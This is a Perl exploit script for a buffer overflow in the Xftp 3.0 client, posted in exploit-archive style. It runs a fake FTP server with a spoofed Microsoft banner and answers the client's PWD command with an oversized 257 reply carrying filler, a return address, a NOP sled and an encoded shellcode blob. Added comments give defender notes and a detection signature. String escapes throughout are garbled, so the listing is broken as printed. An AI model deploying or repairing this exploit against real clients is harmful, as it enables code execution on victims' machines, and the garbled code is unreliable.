# Title : Xftp client 3.0 PWD Remote Exploit
# Published : 2010-04-22
# Author : zombiefx
# Exploit Title: Xftp client 3.0 PWD Remote Exploit
# Date: 2010-04-21
# Author: zombiefx
# Software Link: http://www.netsarang.com/download/down_xft3.html
# Version: Xftp 3.0 build 0238
# Tested on: Windows XP SP3
# Usage: ./xftp_exploit
# The buffer overflow is triggered when the server sends the client an overly long reply to its PWD command.
###########################################################################
# EDB Testing Notes:
# Buffer is length sensitive. If too long (example: 3000 bytes) you won't
# even get a crash at all. Tested on Windows XP SP3 ENG.
###########################################################################
# Code:
#!/usr/bin/perl
# Proof-of-concept harness for the Xftp 3.0 PWD overflow described in the
# header above. It is a minimal fake FTP *server*: the vulnerable party is
# the Xftp client that connects to it, and the trigger is the oversized
# "257" reply sent in answer to the client's PWD command.
#
# Defender's reading of this listing:
#   - Direction matters: the attack is server-to-client, so exposure comes
#     from an Xftp 3.0 user connecting to an untrusted or spoofed FTP
#     server, not from inbound traffic to the user's machine.
#   - Detection: a legitimate 257 reply carries a short quoted directory
#     path. This harness sends a 257 line whose quoted "path" is the whole
#     payload (a 1019-unit filler prefix plus return address, NOP sled and
#     shellcode), i.e. well over a kilobyte of non-path bytes. A reply-line
#     length check on 257 responses is a cheap network signature.
#   - Mitigation: client side only. The page names only the affected build
#     (Xftp 3.0 build 0238, per the header); consult the vendor for a later
#     build rather than assuming a specific fixed version.
#
# NOTE(review): as reproduced on this page the string escapes appear to
# have been lost in extraction (e.g. "x41", "n", and an unbalanced quote on
# the 257 line), so the listing is not runnable as shown.
use warnings;
use strict;
use IO::Socket;
# Listen on the standard FTP control port so an unmodified client connects
# to it; backlog of 1 because only a single victim client is expected.
my $sock = IO::Socket::INET->new( LocalPort => '21', Proto => 'tcp', Listen => '1' )
or die "Socket Not Created $!n";
# Operator banner printed to the local console (not sent to the client).
print "#############################################################n"
. "#Xftp client 3.0 PWD Exploit #n"
. "#Listening on port 21 #n"
. "#By:zombiefx Email: darkernet[at]gmail.com #n"
. "#Major Greetz to corelanc0d3r/Dino Dai Zovi #n"
. "#############################################################n";
# Payload layout (see $payload below): filler up to the saved return
# address, the overwrite value repeated, a NOP sled, then the shellcode.
# The header notes say the overall length is sensitive: too long and no
# crash occurs at all.
my $junk = "x41" x 1019;
# pack('V', ...) is a 32-bit little-endian value; the author believes this
# address is version-independent ("universal") but the module it points
# into is not named anywhere on the page.
my $eip = pack( 'V', 0x100123AF ) x 4; #Universal ..i think
my $nops = "x90" x 55;
# Shellcode blob. Its effect cannot be determined from this listing;
# the variable name suggests a calc.exe demonstration payload.
my $calcshell =
"x89xe2xdaxc1xd9x72xf4x58x50x59x49x49x49x49"
. "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
. "x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
. "x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
. "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a"
. "x48x50x44x43x30x43x30x45x50x4cx4bx47x35x47"
. "x4cx4cx4bx43x4cx43x35x43x48x45x51x4ax4fx4c"
. "x4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31x4a"
. "x4bx51x59x4cx4bx46x54x4cx4bx43x31x4ax4ex50"
. "x31x49x50x4cx59x4ex4cx4cx44x49x50x43x44x43"
. "x37x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4a"
. "x54x47x4bx51x44x46x44x43x34x42x55x4bx55x4c"
. "x4bx51x4fx51x34x45x51x4ax4bx42x46x4cx4bx44"
. "x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c"
. "x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx47"
. "x54x43x34x48x43x51x4fx46x51x4bx46x43x50x50"
. "x56x45x34x4cx4bx47x36x50x30x4cx4bx51x50x44"
. "x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx45x38x43"
. "x38x4bx39x4ax58x4cx43x49x50x42x4ax50x50x42"
. "x48x4cx30x4dx5ax43x34x51x4fx45x38x4ax38x4b"
. "x4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43x45"
. "x31x42x4cx42x43x45x50x41x41";
# Concatenation order is the in-memory layout the client receives.
my $payload = $junk . $eip . $nops . $calcshell;
# Accept loop: one client at a time; $data is the connected socket.
while ( my $data = $sock->accept() ) {
print "Client Connected!nAwaiting Ftp commands: n";
# Spoofed banner so the client believes it reached a Microsoft FTP server.
print $data "220 Microsoft FTP Servicern";
# Scripted login: each client line is echoed to the console, then matched
# case-insensitively as a substring (so "USER"/"PASS"/"PWD" anywhere in
# the line triggers the reply). Only the PWD reply carries the payload.
while (<$data>) {
print;
print $data "331 Anonymous access allowed.rn" if (/USER/i);
print $data "230-Welcome to FTP.MICROSOFT.COM.rn230 User logged in.rn" if (/PASS/i);
print $data "257 "/$payload" is current directory.rn" if (/PWD/i);
}
# Reached once the client closes the control connection.
print "Payload delivered check the client!n";
}